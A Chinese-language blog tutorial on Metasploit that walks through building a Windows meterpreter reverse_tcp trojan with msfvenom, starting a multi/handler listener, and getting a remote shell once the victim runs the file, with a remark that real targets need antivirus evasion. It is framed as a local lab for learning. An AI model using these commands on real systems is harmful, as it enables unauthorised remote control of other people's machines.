為什麼學kali很容易進局子?

前段時間學了msf的一些基礎知識,正好有時間了,在本地搭建好了環境,準備練練手。(Tips:請勿用作非法用途,僅供學術交流)


MSF介紹

Metasploit Framework (MSF)是2003 年以開放源代碼方式發佈、可自由獲取的開發框架,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠的平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode,並且不斷更新,最新版本的MSF 包含了180多種當前流行的操作系統和應用軟件的exploit,以及100多 個shellcode。作為安全工具,它在安全檢測中起到不容忽視的作用,併為漏洞自動化探測和及時檢測系統漏洞提供有力的保障。


配置環境

<code>kali:192.168.83.128
靶機:192.168.83.129/<code>
為什麼學kali很容易進局子?


step1-生成木馬

今天需要使用到msfvenom來生成木馬。

基礎用法作用-p, --payload使用攻擊負荷。指定一個’-'或者輸入(stdin)用戶自定義的payloads(攻擊負荷)。-f, --format輸出格式(使用 --help-formats來查看變量格式列表)-o,–out保存攻擊負荷(payload)

在此次實驗中命令為:

<code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe/<code>

這裡的LHOST為kali的IP,LPORT自然為kali的端口。

為什麼學kali很容易進局子?

ok,生成成功。

為什麼學kali很容易進局子?


step2-將木馬傳入到靶機

這一步就要靠自己的技巧了,而在這裡我是在本地進行試驗

(ps:自行試驗時目標主機必須得關閉安全防護比如防火牆,360等等,如果沒關,則需要對木馬進行免殺處理,木馬才能成功運行)

為什麼學kali很容易進局子?

為什麼學kali很容易進局子?

step3-使用msf偵聽

為什麼學kali很容易進局子?

<code>use exploit/mulit/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.83.128 //kali的ipset LPORT 4444 //kali的端口run/<code>
為什麼學kali很容易進局子?


step4-運行木馬

這一步是通過你自己的技術,使對方運行你的木馬,由於我是在本地試驗,就不贅述了。

為什麼學kali很容易進局子?


step5-獲取shell

當對方成功運行木馬之後,就會反彈一個shell。

為什麼學kali很容易進局子?

在meterpreter後輸入shell即可獲取目標靶機的一個shell

(類似於cmd,可以執行系統命令)

為什麼學kali很容易進局子?


相信看到這裡,大家應該心中都有了答案,入侵一個系統確實不難,所以咱們得把技術用到正地方,而不是想著如何入侵別人的系統,本文也僅供學術交流,大家千萬不要在真實環境試驗,可以的話,自行搭建本地環境,鍛鍊一下自己的技術,本文實現起來不算很難,最後的最後,感謝支持!


分享到:


相關文章: